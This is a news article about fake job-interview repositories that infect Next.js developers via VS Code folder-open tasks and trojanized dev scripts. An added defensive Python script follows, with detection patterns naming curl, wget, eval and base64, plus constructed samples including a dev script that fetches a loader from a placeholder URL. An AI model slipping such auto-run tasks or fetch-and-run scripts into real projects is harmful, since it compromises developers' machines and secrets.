Security News

Cybersecurity news aggregator


Fake 'interview' repos lure Next.js devs into running secret-stealing malware


Come for the coding test, stay for the C2 traffic

Connor Jones, Wed 25 Feb 2026 // 16:51 UTC

Next.js developers are once again in the crosshairs as hackers seed malicious repositories disguised as legitimate projects, according to Microsoft, which said a limited set of those repos were directly tied to observed compromises.

Microsoft said the repositories use different methods to execute on developers' machines, but all lead to the same outcome: in-memory execution of malicious JavaScript.

All of the execution paths identified by its research team are designed to trigger during the Next.js devs' normal working routine. One, for example, abuses Visual Studio Code's workspace automation to load files as soon as the dev opens and trusts the project. In these cases, the variants tend to retrieve a JavaScript loader from Vercel and execute it using Node.js, then begin beaconing to attacker-controlled command-and-control (C2) infrastructure for further tasking.

Other paths involve the targeted developers running the project's development server either directly or via npm run dev, where malicious logic embedded in trojanized assets or modified libraries (such as altered frontend files) retrieves and executes the loader. Others rely on victims starting the application's backend, triggering preloaded logic hidden in backend modules during server initialization or module import.

Regardless of the path taken, the end result is always to register the affected device, run the JavaScript loader, and establish a connection with the attacker's C2 infrastructure. Using a separate C2 IP address and API set handed off by the initial stage, the controller retrieves a messages[] array of JavaScript tasks and executes them in memory using a separate Node interpreter to reduce on-disk artifacts. This process also allows for data exfiltration; on developer machines, this could include anything from personal data to source code, secrets, or cloud resources.

Microsoft said the controller is capable of rotating its identifiers to prevent anti-malware solutions and human defenders from identifying patterns of suspicious activity, in addition to receiving the attacker's instructions. The controller will also obey kill-switch or shutdown commands, track the processes it spawns to prevent the victim from suspecting anything is awry based on performance issues, and report error telemetry, allowing attackers to tweak the commands that fail.

The projects are disseminated by miscreants under the guise that they are used as part of the hiring process, requiring developers to complete tasks related to job applications. And while it's difficult to imagine that targeted devs would complete these interview assessment tasks on a corporate machine, Microsoft warned that doing so could open up an organization to a wider compromise.

It added: "The key takeaway is that defenders should treat developer workflows as a primary attack surface and prioritize visibility into unusual Node execution, unexpected outbound connections, and follow‑on discovery or upload behavior originating from development machines."
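The two execution paths the article describes (a VS Code task that fires when the folder is opened and trusted, and a package.json script such as the one behind npm run dev that pulls in and runs remote code) can both be checked for before a cloned "take-home" repository is trusted. The script below is an added example written for this page, not code from The Register or from Microsoft's research, and its heuristics are assumptions: VS Code's tasks.json really does support runOptions.runOn = "folderOpen", but the list of suspicious script idioms and the sample files are constructed for illustration, not indicators published with the article.

```python
"""
Pre-trust triage of a cloned repository (added example, not from the article).

Flags (1) VS Code tasks configured to run automatically on folder open and
(2) package.json scripts that appear to fetch or evaluate code at run time.
Heuristic only: a hit is a reason to read the file, not proof of malice.
"""
import json
import re
import tempfile
from pathlib import Path

# Constructed heuristics (assumption): shell/Node idioms that reach the
# network or evaluate code from a string inside an npm script.
SUSPICIOUS_SCRIPT_PATTERNS = [
    re.compile(r"\bcurl\b"),
    re.compile(r"\bwget\b"),
    re.compile(r"\bnode\s+(-e|--eval)\b"),
    re.compile(r"https?://"),
    re.compile(r"\beval\b"),
    re.compile(r"\bbase64\b"),
]


def strip_json_comments(text):
    """tasks.json is JSONC: drop // and /* */ comments and trailing commas."""
    text = re.sub(r"(?<!:)//[^\n]*", "", text)        # keep 'https://' intact
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r",(\s*[}\]])", r"\1", text)        # trailing commas
    return text


def auto_run_tasks(tasks_json_text):
    """Return tasks whose runOptions.runOn is "folderOpen" (VS Code auto-run)."""
    data = json.loads(strip_json_comments(tasks_json_text))
    hits = []
    for task in data.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on == "folderOpen":
            hits.append({
                "label": task.get("label", "<unnamed>"),
                "command": task.get("command", ""),
                "args": task.get("args", []),
            })
    return hits


def suspicious_scripts(package_json_text):
    """Return package.json scripts matching any of the constructed patterns."""
    data = json.loads(package_json_text)
    hits = []
    for name, cmd in (data.get("scripts") or {}).items():
        matched = [p.pattern for p in SUSPICIOUS_SCRIPT_PATTERNS if p.search(cmd)]
        if matched:
            hits.append({"script": name, "command": cmd, "matched": matched})
    return hits


def triage_repo(repo_dir):
    """Walk a checkout and collect (finding_type, details) tuples."""
    repo = Path(repo_dir)
    findings = []
    tasks_file = repo / ".vscode" / "tasks.json"
    if tasks_file.is_file():
        for t in auto_run_tasks(tasks_file.read_text(encoding="utf-8")):
            findings.append(("vscode-folderOpen-task", t))
    for pkg in repo.rglob("package.json"):
        if "node_modules" in pkg.parts:
            continue
        for s in suspicious_scripts(pkg.read_text(encoding="utf-8")):
            findings.append(("package-script",
                             {"file": str(pkg.relative_to(repo)), **s}))
    return findings


# Constructed sample inputs (not real indicators).
SAMPLE_TASKS_JSON = """{
  // constructed sample: runs as soon as the folder is opened and trusted
  "version": "2.0.0",
  "tasks": [
    {
      "label": "setup",
      "type": "shell",
      "command": "node",
      "args": ["scripts/setup.js"],
      "runOptions": { "runOn": "folderOpen" },
    },
    { "label": "lint", "type": "shell", "command": "npm run lint" }
  ]
}"""

SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "interview-task",
    "scripts": {
        "dev": "node scripts/bootstrap.js https://example.invalid/loader.js && next dev",
        "build": "next build",
        "lint": "next lint",
    },
})


if __name__ == "__main__":
    # Build a throwaway checkout containing the samples and triage it.
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / ".vscode").mkdir()
        (Path(d) / ".vscode" / "tasks.json").write_text(SAMPLE_TASKS_JSON)
        (Path(d) / "package.json").write_text(SAMPLE_PACKAGE_JSON)
        for kind, details in triage_repo(d):
            print(kind, details)
```

Run it against a fresh clone before opening the folder in VS Code or running npm run dev; an auto-run task or a dev script that reaches out to a URL is exactly the kind of thing to read by hand first, ideally in a disposable VM rather than on a machine holding corporate credentials.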